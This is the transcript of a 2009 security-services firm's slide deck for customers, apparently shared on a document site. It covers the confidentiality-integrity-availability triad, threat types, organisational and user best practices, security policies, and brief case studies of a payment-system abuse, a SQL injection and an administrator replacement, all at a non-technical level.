Slides

Information Security: A mindset, not a product

Description
1. SAGECare® Security Practice Customer Appreciation Days Information Security - A mindset, not a product www.SAGEcomputer.com Making Business Smarter ©Copyright 2009,…
Categories
Published
of 28
All materials on our website are shared by users. If you have any questions about copyright issues, please report us to resolve them. We are always happy to assist you.
Related Documents
Share
Transcript
  • 1. SAGECare® Security Practice Customer Appreciation Days Information Security - A mindset, not a product www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 2. SAGECare® Introductions Security Practice • SAGE Computer Associates, Inc – Designing, installing, supporting computer networks since 1983 – Experience supporting 300+ clients – Certified engineers on staff • Jeff Cohn – President • Jason Appel – Security Practice Manager – CISSP, CCSP, INFOSEC, MCSE, MCT, MCSA, CCDA, CSSA www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 3. This morning... • In the news... • What is Information Security • AAA – Authentication, Authorization, Accounting • Threat Identification • Policies • Case studies: recent local incidents www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 4. In the news… www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 5. Information Security NOT about computers It’s about the information… www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 6. Information Security Goal: IAC triad Availability Integrity Confidentiality www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 7. Integrity • Information is valid and usable • Confidence in the information – Garbage in, garbage out • Preventing accidental or malicious changes • Only authorized changes www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 8. Availability • Information is there when needed • Redundant systems – RAID – Power – Network – Server clusters – Virtualization www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 9. Availability • Data backup, backup… oh, and backup again – Backup testing – Offsite storage – Media encryption • Business Continuity/Disaster Recovery Plan – PLAN (a GOOD 4 letter word) – Practice – Based on roles, not persons www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 10. Confidentiality • Only those authorized have access to information • File permissions and rights – Limit access • Communications – email, voice, file transfer • Encryption • Various models for information classification – Could be time sensitive • Data Destruction www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 11. AAA – Who, What, Where of IAC • Authentication: who are you? – Username/password – 2 factor authentication – Passwords... • Authorization: what can you do? – Rights and permissions • Accounting: who did what? – Logging, auditing and tracking • Identification and deniability www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 12. Threat Identification: External • Breach (Confidentiality, Integrity, Availability) – Possible external access to information or systems • Identity Theft (Confidentiality) – Using someone’s personal data for financial gain • Social Engineering (Confidentiality) – Using confidence (con) to gain access to information – Often used to gain information to create a breach • Spam (Availability, Integrity) – Unsolicited email – May contain malicious code or phishing links • Phishing (Confidentiality) – Spoofed (fake) message to trick people into posting information – Often used as basis for identity theft www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 13. Threat Identification: External • DoS - Denial of Service - (Availability) – Service is not available for legitimate use • Cracking/hacking (Integrity, Confidentiality, Availability) – Unauthorized, actively accessing systems • Malicious code (Integrity, Confidentiality, Availability) – Program or script that will cause harm - aka Malware – Viruses - require software or computer’s components – Worms - functioning and self replicating without computer’s components – Trojan horse - malicious code masked as a useful or desirable program – Spyware/adware - non-malicious software used to track users and display advertising • Often poorly written and causes performance problems • May contain other malicious code www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 14. Threat Identification: Internal • Internal threats – Accidental or deliberate from authorized and trusted sources – Majority of security incidents are from internal sources • Information corruption (Integrity) – Data is not entered correctly or is modified to be wrong • Information destruction (Integrity) – Data is removed or deleted or otherwise inaccessible • Information leak (Confidentiality) – Data is revealed to unauthorized persons • Information outage (Availability) – Data services not available www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 15. What can we do – as an organization • Security Mindset – To catch a thief, think like a thief • Know your data – What would others like to gain access to? – What could be sold? – What you cannot work without? – Legally and contractually protected data • Encryption – A tool, not a panacea – Backup media – Hard drives – Communications – Flash drives • Educate users – Formal policies – Usage training www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 16. What can we do - as an organization • Follow best practices – Updates - Operating systems, firmware, software, Anti-Malware – Protection - Anti-Malware – Minimalist - run only what you need • Secure the network – Firewalls - stateful and deep packet inspection at perimeter – Anti-Malware at perimeter – IPS/IDS, perimeter and internal – DMZ – Software firewalls • Vendor support – Hardware warranties – Communication SLA – Support SLA www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 17. What can we do - as users • Anti-malware software – Run current versions of reputable anti-malware software – Be sure to update regularly with latest virus, adware and spyware definitions • Update all software regularly – Turn on automatic operating system and software updates – Put a reminder on your calendar to check on your other programs regularly • Includes Java, Flash and other browser based programs • If you don’t need it, don’t install it – Do not use free software at work • Malware • Licensing liability www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 18. What can we do - as users • Follow safe browsing and communications practices (internet, email, IM, social sites) – Pop-ups - ALT+F4 to close – Type-in, do not click through, specifically email • Helps avoid phishing and malware – If you would not write it on paper, do not write it (email or online) – Avoid forwarding chain email and questionable jokes • Be aware of who you’re sending it to – Use work PC for work • Know your organization’s policies www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 19. Formal Policies • Formal written policies should be guidelines for behavior and actions – Should be intelligible, readable and realistic documents, not legal contracts • Idea is to augment training and answer questions, not restrict employees www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 20. Formal Policies • Should we delete old emails? Should we reply to spam? • What can we send over email, IM and post on social networking websites? www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 21. Formal Policies • Should we run free software from spam and pop-ups? Open attachments? • Can we listen to streaming music and watch videos over the internet? www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 22. Formal Policies • Is our data safe? What if something happens to the building? • Do we really need passwords? Can we put them on post-its? • Can we access the network remotely? www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 23. Formal Policies • Consistently enforced policies protect both user and organization when facing… – Disasters – Legal discovery – Harassment issues – Employment disputes www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 24. Typical Policies • Computer, network and internet acceptable usage • Email and communications usage and retention • Data retention • Information Security • Business Continuity / Disaster Recovery www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 25. Recent Cases: Billing Website • Online payment system compromised • Healthcare funding organization accepting donations online • Recently changed payment providers to new system • On old system, thousands of small (less than $1) authorizations over a weekend • Analysis – No authorizations only, no charges made – No access to real donor information – Automated submissions, possibly pulled from old website code (5 years old) • Costs: – Incident investigation and report – Processing fees – Employee time & productivity www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 26. Recent Cases: SQL Injection • Database compromise • Not-for-profit community service scheduling events on website • Website began redirecting users to a virus download, and download URL was found in the scheduling database – Database contained customer identifiable info, credit card numbers, and social security numbers • Analysis: – Exploit: websites with a “trivial coding error” and using Microsoft SQL server databases, ASP update not applied to web server – SQL injection: corrupt data was added to database (URL), no data read from database • Costs: – Incident investigation and report – Database sanitizing – Employee time & productivity – all internet access was initially blocked during the investigation – Reputation www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 27. Recent Cases: Admin Replacement • IT administrator no longer trusted • Multiple clients ranging from associations, to professional offices, to health care providers • IT Administrator is going to be let go, gone missing, or is in jail • Password resets: – Network devices • Firewalls, routers, switches, wireless networks – Administrator accounts • Server, PCs, databases, email, applications – Service and vendor accounts • Backup accounts, application accounts – Remote access • VPN, portals – 3rd party accounts • Vendors – ALL user accounts www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 28. Customer Appreciation Days Questions? Secure@SAGEComputer.com www.SAGEcomputer.com Making Business Smarter ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • Search
    Similar documents
    View more...
    Related Search
    We Need Your Support
    Thank you for visiting our website and your interest in our free products and services. We are nonprofit website to share and download documents. To the running of this website, we need your help to support us.

    Thanks to everyone for your continued support.

    No, Thanks